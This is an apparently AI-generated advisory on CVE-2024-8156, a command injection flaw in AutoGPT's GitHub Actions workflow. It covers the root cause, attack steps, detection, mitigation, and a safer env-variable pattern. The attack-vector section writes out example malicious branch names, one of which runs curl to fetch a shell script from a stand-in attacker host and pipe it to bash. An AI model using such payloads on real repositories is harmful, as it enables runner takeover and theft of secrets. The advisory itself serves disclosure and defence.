CVE-2024-8156 Overview
A command injection vulnerability exists in the workflow-checker.yml workflow of significant-gravitas/autogpt. The untrusted user input github.head.ref is used insecurely, allowing an attacker to inject arbitrary commands. This vulnerability affects versions up to and including the latest version. An attacker can exploit this by creating a branch name with a malicious payload and opening a pull request, potentially leading to reverse shell access or theft of sensitive tokens and keys.
Critical Impact
This command injection vulnerability allows unauthenticated remote attackers to execute arbitrary commands on the GitHub Actions runner, potentially gaining reverse shell access or stealing sensitive repository secrets, tokens, and API keys.
Affected Products
- Agpt AutoGPT Classic (all versions up to and including the latest)
- agpt:autogpt_classic component
- GitHub Actions workflow: workflow-checker.yml
Discovery Timeline
- 2025-03-20 - CVE-2024-8156 published to NVD
- 2025-10-15 - Last updated in NVD database
Technical Details for CVE-2024-8156
Vulnerability Analysis
This vulnerability is classified as CWE-77 (Command Injection), arising from improper neutralization of special elements used in a command. The vulnerable workflow file workflow-checker.yml directly interpolates the github.head_ref context variable into a shell command without proper sanitization or escaping.
In GitHub Actions, the github.head_ref variable contains the name of the head branch in a pull request event. Since branch names are user-controlled, an attacker can craft a malicious branch name containing shell metacharacters and command sequences that will be executed when the workflow runs.
The attack requires no privileges on the target repository—any user who can fork the repository and open a pull request can trigger the vulnerable code path. This makes the vulnerability particularly dangerous for open-source projects that accept community contributions.
Root Cause
The root cause is the unsafe use of GitHub Actions expression syntax (${{ github.head_ref }}) directly within a run: block without proper input validation or escaping. When this expression is evaluated, the branch name is directly interpolated into the shell command, allowing shell metacharacters to be interpreted.
GitHub Actions workflows that use expressions like ${{ github.head_ref }}, ${{ github.event.pull_request.title }}, or similar user-controlled inputs in shell commands are susceptible to this class of vulnerability if the inputs are not properly sanitized.
Attack Vector
The attack vector is network-based and requires no authentication to the target repository. An attacker exploits this vulnerability through the following sequence:
- Fork the vulnerable repository
- Create a branch with a malicious name containing shell injection payload (e.g., feature$(whoami) or test"; curl attacker.com/shell.sh | bash; #)
- Open a pull request from the malicious branch to the target repository
- The GitHub Actions workflow automatically triggers on the pull request event
- The injected commands execute in the context of the GitHub Actions runner with access to repository secrets
This attack can lead to exfiltration of GITHUB_TOKEN and other repository secrets, modification of repository contents, lateral movement to connected services, and supply chain compromise if the repository produces artifacts or releases.
Detection Methods for CVE-2024-8156
Indicators of Compromise
- Unusual pull requests from unknown forks with suspicious branch names containing shell metacharacters (;, |, $(), backticks)
- GitHub Actions workflow logs showing unexpected command execution or network connections
- Anomalous outbound network traffic from GitHub Actions runners to unknown external hosts
- Unauthorized access to repository secrets or unexpected API calls using repository tokens
Detection Strategies
- Audit GitHub Actions workflow files for unsafe use of ${{ github.* }} expressions in run: blocks
- Monitor pull request activity for branch names containing shell metacharacters or encoded payloads
- Review GitHub Actions workflow run logs for command execution anomalies or unexpected outputs
- Implement branch name validation at the repository level to reject names with special characters
Monitoring Recommendations
- Enable GitHub audit logging and monitor for unusual workflow execution patterns
- Set up alerts for pull requests from first-time contributors with unusual branch naming patterns
- Configure repository rules to require approval before workflows run on pull requests from forks
- Monitor for secrets rotation triggers that might indicate token theft
How to Mitigate CVE-2024-8156
Immediate Actions Required
- Update to the patched version by applying commit 1df7d527dd37dff8363dc162fb58d300f072e302
- Review and rotate any secrets that may have been exposed in previous workflow runs
- Audit existing pull requests for suspicious branch names that may have triggered the vulnerability
- Enable "Require approval for all outside collaborators" in repository workflow settings
Patch Information
The vulnerability has been addressed in the GitHub commit 1df7d527dd37dff8363dc162fb58d300f072e302. Organizations using AutoGPT should update their deployments to include this fix. Additional technical details about the vulnerability discovery can be found in the Huntr bounty report.
Workarounds
- Pass user-controlled inputs as environment variables instead of using direct expression interpolation in shell commands
- Use intermediate steps to sanitize and validate branch names before use in shell commands
- Configure repository settings to require manual approval for workflow runs on pull requests from forks
- Implement branch protection rules that restrict branch naming patterns to alphanumeric characters
# Secure pattern: Use environment variables instead of direct interpolation
# Instead of: run: echo "Branch: ${{ github.head_ref }}"
# Use this pattern in your workflow:
env:
BRANCH_NAME: ${{ github.head_ref }}
run: |
# Validate the branch name before use
if [[ ! "$BRANCH_NAME" =~ ^[a-zA-Z0-9/_-]+$ ]]; then
echo "Invalid branch name detected"
exit 1
fi
echo "Branch: $BRANCH_NAME"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
